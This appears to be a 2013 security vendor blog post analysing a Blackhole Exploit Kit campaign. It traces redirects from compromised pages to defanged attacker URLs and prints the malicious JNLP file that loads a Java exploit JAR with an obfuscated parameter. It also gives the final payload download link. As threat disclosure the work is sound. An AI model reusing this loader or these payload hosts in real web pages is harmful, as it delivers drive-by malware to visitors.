According to http://permalink.gmane.org/gmane.comp.security.ids.snort.emerging-sigs/19247,Blackhole Exploit Kit 2.0 infected many websites named "*/linkendorse.html".
It often uses large SPAM mails to spread the malicious links!
AegisLab also collected many similar malicious links.
When you connect to these victim websites,they will redircet you to hxxp://onlinedatingblueprint.net/news/suspect-someplace.php
We can see "Redirecting to Complain details… Please wait…",the sentence is well-known Blackhole Exploit Kit's pattern!
For more details,you can refer to this.
Then,the landing page detects your browser and plugin information,redirect you to next hopping sites.
If your browser is vulnerable,you will download a jnlp file:hxxp://onlinedatingblueprint.net/news/suspect-someplace.php?jnlp=e4658ff1b1
<?xml version="1.0" encoding="utf-8"?> <jnlp spec="1.0" xmlns:jfx="http://javafx.com"> <information> <title>JNLP</title> <vendor>JNLP</vendor> <description>JNLP</description> <offline-allowed/> </information> <resources> <j2se version="1.6+" href="http://java.sun.com/products/autodl/j2se"/> <jar href="/news/suspect-someplace.php?tovx=wup&hld=mzhbvvdd" main="true"/> </resources> <applet-desc name="Jn" main-class="wh" width="1" height="1"> <param value="true" name="__applet_ssv_validated"></param> <param name="val" value="Dyy"></param> <param name="prime" value="3Ojjto-8oeMVy8oA?-Ke3l8oywoeyjoe_ijiKi3e%ymit0e3-V%ew3D3x_.b6DO60Oh_O6oO6tRVeb1hO6CO6-O6qO6oO11O11O6AOh_O6ARtb6.RKeb8R0ob_"></param> </applet-desc> </jnlp>
Otherwise,you will be redirected to Google search "linkedin".
Above jnlp will get a JAR. The JAR file includes Java exploit to execute PE or PDF.
The final download site is:
hxxp://onlinedatingblueprint.net/news/suspect-someplace.php?cf=1l:1i:30:2w:1o&fe=32:1j:1l:1k:1n:33:33:1g:2w:1g&x=1f&nh=a&do=j
Detection rate in VirusTotal:7/47
AegisLab WebGuard has blocked [D]onlinedatingblueprint.net,we urge our customer to keep WebGuard signature up to date.
[2013.06.07 update]
New:"*/natpay.html" leads to "hxxp://usforclosedhomes.net/news/walls_autumns-serial.php"
AegisLab WebGuard also has blocked [D]usforclosedhomes.net !